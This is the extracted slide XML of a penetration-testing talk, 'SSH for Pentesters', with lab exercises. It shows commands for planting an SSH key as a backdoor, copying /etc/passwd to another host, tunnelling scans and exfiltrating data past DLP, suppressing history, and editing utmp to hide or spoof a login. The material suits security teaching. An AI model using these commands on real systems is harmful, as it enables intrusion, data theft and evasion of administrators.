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8.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide38.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide13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34.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide31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42.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide40.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide29.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide27.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide39.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide37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41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0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42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39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1/19/13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219111-7151-41F1-8141-B1812101013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1/19/13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17161B1-C1D1-4131-8171-41C1F1C121F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hyperlink" Target="http://en.wikipedia.org/wiki/Secure_Shell" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gonullyourself.org/main/index.php" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.openssh.com/" TargetMode="External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SSH for Pentesters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Andrew Morris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morr.drew@gmail.com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Write this down!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Target – 10.101.2.206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Username – unallocated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Password - sshrules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Gaining Access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Code exec to a Linux box?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Generate a quick public key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# ssh-keygen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Drop it in /home/user/.ssh/authorized_keys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SSH in, no password prompted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Upgraded from code exec to interactive shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p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Who cares?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Can be an effective backdoor technique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Can be very powerful when combined with other SSH trickery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Gaining Access Exercise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Generate a public/private keypair with “ssh-keygen” with a blank passphrase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Transfer public key to target server with SCP or SFTP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Paste your key into ~/.ssh/authorized_keys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SSH into the machine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Bask in your glory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File Transfer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By default SSH servers allow inline file transfer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Uses FTP-ish syntax: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GET, PUT, CD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#sftp andrew@andrewmorris.xxx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Connecting to andrewmorris.xxx...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andrew@andrewmorris.xxx's password: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sftp&gt;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File Transfer (cont’d)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You can also use SCP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# scp andrew@andrewmorris.xxx:/etc/passwd passwd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# scp andrew@andrewmorris.xxx:/etc/passwd andrew@prestonisadouchebag.com:/home/andrew/passwd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Who cares?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Tool uploads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PUT l33t-r00t-spl0it.tar.gz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Data exfiltration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Moving 4 GB of Social Security numbers or a giant NTDS.dit file looks terrible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Tons of SSH traffic looks marginally less terrible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File Transfer Exercise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Run Wireshark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Only inspect traffic on port 22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tcp port 22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Download /etc/passwd file with scp, sftp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Inspect traffic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Tunneling Traffic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Tunnel traffic FROM the client TO the server network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Tunnel traffic FROM the server network TO your machine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Tunnel anything!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Something to remember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Local tunnels open the entry point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locally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Remote tunnels open the entry point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remotely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About Me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Penetration Tester at medium sized consulting company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Hold OSCP, GXPN, working on OSCE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 my free time I play music and find confusing GIFs on the Internet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Local Tunneling - Usage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 want to communicate with a remote service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alibri"/>
              </a:rPr>
              <a:t># ssh –L 3389:192.168.1.2:3389 andrew@home.com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By default, will bind to localhost interface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You can use –g flag to bind to network interface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Crazy reverse shells!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Internal cross site scripting!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Application Proxies!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Hide your stuff!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Screw firewalls!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You can specify 127.0.0.1 to point to services on the remote box that would be hidden by firewall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Remote Tunneling - Usage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 want something on the remote network to talk to me, or something I can see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# ssh –R 192.168.1.5:8080:10.10.10.10:8080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Compromise an internal portal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Put the service on a different port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Forward the regular port to yourself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Sniff traffic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Forward traffic back to irregular port on client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NO ONE EVER KNOWS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Tunneling Exercise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Tunnel through Linux lab machine to the HTTP service on port 8080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# ssh -L 8080:10.10.10.10:8080 user@linux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“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Having to reconstruct static SSH tunnels for each target SUCKS”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Dynamic Tunneling - Usage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Spawn a SOCKS proxy natively that runs in the network context of the SSH server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# ssh –D 8080 andrew@andrewmorris.xxx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Yup. That’s it.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Dynamic SSH Tunnel + Proxychains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1600200"/>
            <a:ext cx="8229240" cy="5028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Nmap scans through proxychains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# proxychains nmap –p445 –Pn –n 192.168.0.1-5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Firefox through proxychains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# proxychains firefox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Nessus through proxychains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# proxychains nessusd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SSH through proxychains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# proxychains ssh –D 8081 andrew@andrewmorris.xxx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 just blew my own mind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Examples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Compromise Linux DMZ server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Box isn’t vulnerable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Use proxychains to kick off single port scan to identify Windows boxes with smb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Version scan, find a Windows 2000 box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MS08_067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Examples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Execute client side attack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Compromise internal box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Escalate privileges, move laterally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Gain access to secretSauce source code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Exfiltrate through an SSH tunnel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Looks like outbound SSH traffic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Who cares?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You don’t need to be privileged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“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Screw this box, man”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Enabled by default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Can access anything that the target box can see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Launching exploits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Connecting to shares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Browsing internal sites</a:t>
            </a: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Who cares (cont’d)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Everything between you and the server is SSH traffic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Screw you, DLP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Secure. Can be used on penetration tests.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Unless deep packet inspection or white listing is in use, it will work 60% of the time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…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.every time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Overview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How to attack SSH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How to take advantage of cool features of SSH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Stupid tricks I’ve learned</a:t>
            </a:r>
            <a:endParaRPr/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 Couple of Tricks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“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But Andrew, renegotiating an SSH session for each tunnel totally sucks”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…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="8b8b8b"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>And it makes for lot of logs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Inline SSH Tunneling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You can drop out of SSH sessions and negotiate tunnels inline, without negotiating a new session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Default escape key is ~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Carriage return, Tilde, then shift+C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root@bt:~# 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ssh&gt; -D 8080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Forwarding port.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root@bt:~# </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p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Layer 3 Tunnel (Poor man’s VPN)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All of the aforementioned SSH tunnels were at Layer 4. They only allow TCP connections.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Establishing a Layer 3 tunnel is possible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Creates tun interface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ssh -w5:5 root@box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You can ping boxes, grab DHCP, communicate over UDP, etc.</a:t>
            </a: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Layer 3 Tunnel (cont’d) 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settings required for VPN over SSH are not configured by default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You need root access on the box to make the configuration changes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More advanced setup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Routing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IP forwarding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etc</a:t>
            </a:r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Hiding from SysAdmins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It is trivial to hide from utilities like “who”, “w”, “lastlog” on most (all) machines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–T flag in an SSH command suppresses attaching to a pseudo-terminal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Utmp data is not logged when Bash is executed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All utmp data is logged once you are attached to a pseudo-terminal</a:t>
            </a:r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Hiding from SysAdmins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Try it!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# ssh user@server –T /bin/bash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$ w</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:endParaRPr/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Hiding from SysAdmins (part II)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You can cover your tracks by unsetting the HISTFILE variable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This prevents your commands from being logged by the server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# unset HISTFILE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:endParaRPr/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Blackmail your rivals (more hiding from SysAdmins)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Once you’ve gained root access, it’s possible to manipulate utmp into displaying whatever IP address or string of text that you want when “who” is invoked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# w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USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT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root     pts/0    10.10.10.10     16:04    1.00s  0.27s  0.00s w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# sed -i 's/10.10.10.10/20.20.20.20/g' /var/run/utmp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# w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USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT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root     pts/0    20.20.20.20    09:22    0.00s  0.29s  0.00s w</a:t>
            </a:r>
            <a:endParaRPr/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Blackmail your rivals (more hiding from SysAdmins part II)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You don’t need to overwrite with another IP address. You can overwrite it with anything, as long as it’s the same length as the IP address.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900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>root     pts/0    10.10.10.10     16:04    1.00s  0.27s  0.00s w</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>sed -i 's/10.10.10.10/NICHOLASCAGE/g' /var/run/utmp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>root     pts/0    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>NICHOLASCAGE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>    09:22    0.00s  0.29s  0.00s w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Quick Background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SSH stands for Secure Shell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Written by some guy named Tatu at Helsinki University of Technology because students kept sniffing his passwords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Modern replacement for Telnet, rsh, etc.</a:t>
            </a:r>
            <a:endParaRPr/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Questions?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Thanks for listening!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morr.drew@gmail.com</a:t>
            </a:r>
            <a:endParaRPr/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Sources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u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Secure_Shell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u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.gonullyourself.org/main/index.php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u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html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u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.openssh.com/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Authentication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Uses password-based authentication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Uses Diffie-Hellman key exchange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Public key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Private key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~/.ssh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~/.ssh/authorized_keys</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:endParaRPr/>
          </a:p>
          <a:p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Tools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SSH client is built into most modern Linux distros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Putty is a Windows GUI-(ish) terminal emulator with SSH support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Plink is a Windows CLI SSH client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*Putty installer is awesome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Tools (cont’d)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Putty installer includes the full Putty suite.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Putty.exe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Windows Terminal Emulator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Plink.exe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Command line SSH client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Psftp.exe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SFTP client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Puttygen.exe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Generate and convert SSH Keys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Tools (cont’d)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Some SSH gymnastics rely on the client you have available.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Windows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Putty &gt; Connections &gt; SSH &gt; Tunnels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Linux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# ssh (options)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Abusing SSH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